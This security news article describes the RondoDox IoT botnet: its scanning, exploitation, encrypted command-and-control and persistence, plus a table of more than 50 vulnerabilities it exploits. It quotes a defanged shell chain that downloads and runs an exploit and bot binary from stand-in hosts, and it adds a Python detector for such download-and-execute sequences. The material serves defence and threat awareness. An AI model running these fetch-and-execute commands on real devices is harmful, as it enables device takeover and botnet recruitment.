Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.
Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.
In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.
Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.
Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.
The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.
Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.
This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.
Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.
Infection Mechanism
RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.
Once a target is identified, the appropriate exploit payload—drawn from its extensive repository—is delivered.
For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:

```
wget http[:]//malicious.example/exploit; chmod +x exploit
./exploit -u admin -p '' -c 'wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./rondox'
```
After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.
Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.
Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.
The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.
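The fetch-then-execute chain quoted above is a useful hunting signature regardless of which CVE delivered it. The Python below is an added example, not code from Trend Micro or from this article, run over constructed sample command lines (defanged URLs, TEST-NET addresses): it tracks files that are downloaded, made executable and then run within one command stream, and reports each such execution together with its staging URL so the host can be blocklisted.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: shell command lines as a honeypot or auditd EXECVE
# record might capture them. The first two mirror the defanged chain quoted
# in the article; the rest are benign or incomplete, for contrast.
SAMPLE_COMMANDS = [
    "wget http[:]//malicious.example/exploit; chmod +x exploit",
    "./exploit -u admin -p '' -c 'wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./rondox'",
    "wget https://deb.debian.org/debian/pool/main/c/curl/curl_8.0.1.orig.tar.gz",
    "chmod +x build.sh && ./build.sh",
    "curl -o /tmp/.x http[:]//198.51.100.7/arm7; chmod 777 /tmp/.x; /tmp/.x",
]

_TOKEN = r"[^\s;&|'\"]+"                      # one shell word, stops at separators/quotes
# Downloader invocation and its URL; "[:]" is accepted so defanged samples still match.
FETCH_RE = re.compile(r"\b(?P<tool>wget|curl)\b(?P<args>[^;&|]*?)(?P<url>https?\[?:\]?//" + _TOKEN + ")")
OUT_RE = re.compile(r"-[oO]\s+(?P<out>" + _TOKEN + ")")           # explicit output file name
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s+(?P<path>" + _TOKEN + ")")  # made executable
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?P<path>\.?/" + _TOKEN + ")")  # path run as a command


def find_download_exec_chains(commands: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, basename, source_url) for every execution of a file that
    was fetched and chmod'ed executable earlier in the same command stream."""
    staged: Dict[str, str] = {}   # basename -> URL it was downloaded from
    armed: Set[str] = set()       # staged basenames later made executable
    hits: List[Tuple[int, str, str]] = []
    for no, cmd in enumerate(commands, 1):
        for m in FETCH_RE.finditer(cmd):
            out = OUT_RE.search(m.group("args"))
            name = out.group("out") if out else m.group("url")
            staged[name.rsplit("/", 1)[-1]] = m.group("url")
        for m in CHMOD_RE.finditer(cmd):
            base = m.group("path").rsplit("/", 1)[-1]
            if base in staged:
                armed.add(base)
        for m in EXEC_RE.finditer(cmd):
            base = m.group("path").rsplit("/", 1)[-1]
            if base in armed:
                hits.append((no, base, staged[base]))
    return hits


if __name__ == "__main__":
    for line_no, name, url in find_download_exec_chains(SAMPLE_COMMANDS):
        print(f"line {line_no}: executed staged file '{name}' fetched from {url}")
```

A plain `chmod +x build.sh && ./build.sh` with no preceding download is deliberately not reported, which keeps the rule from firing on ordinary admin activity.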
A timeline of the RondoDox vulnerability (Source – Trend Micro)
Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.
Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.
The table below lists the 50+ vulnerabilities currently exploited by RondoDox, giving for each the affected vendor and product, the CVE identifier where one has been assigned, the vulnerability class (CWE or type), and its status as an N-day, targeted, or uncatalogued flaw.
# | Vendor / Product | CVE ID | CWE / Type | Status | Notes |
---|---|---|---|---|---|
1 | Nexxt Router Firmware | CVE-2022-44149 | CWE-78 (Command Injection) | N-Day | |
2 | D-Link Routers | CVE-2015-2051 | CWE-78 | N-Day | |
3 | Netgear R7000 / R6400 | CVE-2016-6277 | CWE-78 | N-Day | |
4 | Netgear (mini_httpd) | CVE-2020-27867 | CWE-78 | N-Day | |
5 | Apache HTTP Server | CVE-2021-41773 | CWE-22 (Path Traversal / RCE) | N-Day | |
6 | Apache HTTP Server | CVE-2021-42013 | CWE-22 | N-Day | |
7 | TBK DVRs | CVE-2024-3721 | CWE-78 | Targeted | |
8 | TOTOLINK (setMtknatCfg) | CVE-2025-1829 | CWE-78 | N-Day | |
9 | Meteobridge Web Interface | CVE-2025-4008 | CWE-78 | N-Day | |
10 | D-Link DNS-320 | CVE-2020-25506 | CWE-78 | N-Day | |
11 | Digiever DS-2105 Pro | CVE-2023-52163 | CWE-78 | N-Day | |
12 | Netgear DGN1000 | CVE-2024-12847 | CWE-78 | N-Day | |
13 | D-Link (multiple) | CVE-2024-10914 | CWE-78 | N-Day | |
14 | Edimax RE11S Router | CVE-2025-22905 | CWE-78 | N-Day | |
15 | QNAP VioStor NVR | CVE-2023-47565 | CWE-78 | N-Day | |
16 | D-Link DIR-816 | CVE-2022-37129 | CWE-78 | N-Day | |
17 | GNU Bash (ShellShock) | CVE-2014-6271 | CWE-78 (Code Injection) | N-Day / Historical | |
18 | Dasan GPON Home Router | CVE-2018-10561 | CWE-287 (Auth Bypass) | N-Day | |
19 | Four-Faith Industrial Routers | CVE-2024-12856 | CWE-78 | N-Day | |
20 | TP-Link Archer AX21 | CVE-2023-1389 | CWE-78 | Targeted | |
21 | D-Link Routers | CVE-2019-16920 | CWE-78 | N-Day | |
22 | Tenda (fromNetToolGet) | CVE-2025-7414 | CWE-78 | N-Day | |
23 | Tenda (deviceName) | CVE-2020-10987 | CWE-78 | N-Day | |
24 | LB-LINK Routers | CVE-2023-26801 | CWE-78 | N-Day | |
25 | Linksys E-Series | CVE-2025-34037 | CWE-78 | N-Day | |
26 | AVTECH CCTV | CVE-2024-7029 | CWE-78 | N-Day | |
27 | TOTOLINK X2000R | CVE-2025-5504 | CWE-78 | N-Day | |
28 | ZyXEL P660HN-T1A | CVE-2017-18368 | CWE-78 | N-Day | |
29 | Hytec HWL-2511-SS | CVE-2022-36553 | CWE-78 | N-Day | |
30 | Belkin Play N750 | CVE-2014-1635 | CWE-120 (Buffer Overflow) | N-Day | |
31 | TRENDnet TEW-411BRPplus | CVE-2023-51833 | CWE-78 | N-Day | |
32 | TP-Link TL-WR840N | CVE-2018-11714 | CWE-78 | N-Day | |
33 | D-Link DIR820LA1 | CVE-2023-25280 | CWE-78 | N-Day | |
34 | Billion 5200W-T | CVE-2017-18369 | CWE-78 | N-Day | |
35 | Cisco (multiple products) | CVE-2019-1663 | CWE-119 (Memory Corruption) | N-Day | |
36 | TOTOLINK (setWizardCfg) | CVE-2024-1781 | CWE-78 | N-Day | |
37 | Hikvision NVR | — | Command Injection | No CVE | Listed by Trend Micro w/o CVE |
38 | Dahua DVR | — | Remote Code Execution | No CVE | Listed by Trend Micro w/o CVE |
39 | Wavlink Routers | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
40 | ZTE ZXHN Router | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
41 | Seenergy NVR | — | Authentication Bypass | No CVE | Listed by Trend Micro w/o CVE |
42 | Uniview NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
43 | TP-Link TD-W8960N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
44 | Dahua IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
45 | HiSilicon Firmware | — | Buffer Overflow | No CVE | Listed by Trend Micro w/o CVE |
46 | Amcrest Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
47 | Hikvision IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
48 | LILIN Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
49 | TP-Link WR941N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
50 | Wavlink WL-WN575A3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
51 | Dahua NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
52 | Tenda AC6 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
53 | Hikvision DS-7108HGHI | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
54 | LB-LINK BL-WR450H | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
55 | ZTE ZXHN H108N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
56 | Wavlink WL-WN531G3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |